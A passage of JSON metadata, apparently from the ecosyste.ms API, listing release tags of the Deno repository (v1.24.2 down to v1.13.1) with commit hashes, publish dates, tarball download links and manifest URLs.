.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name"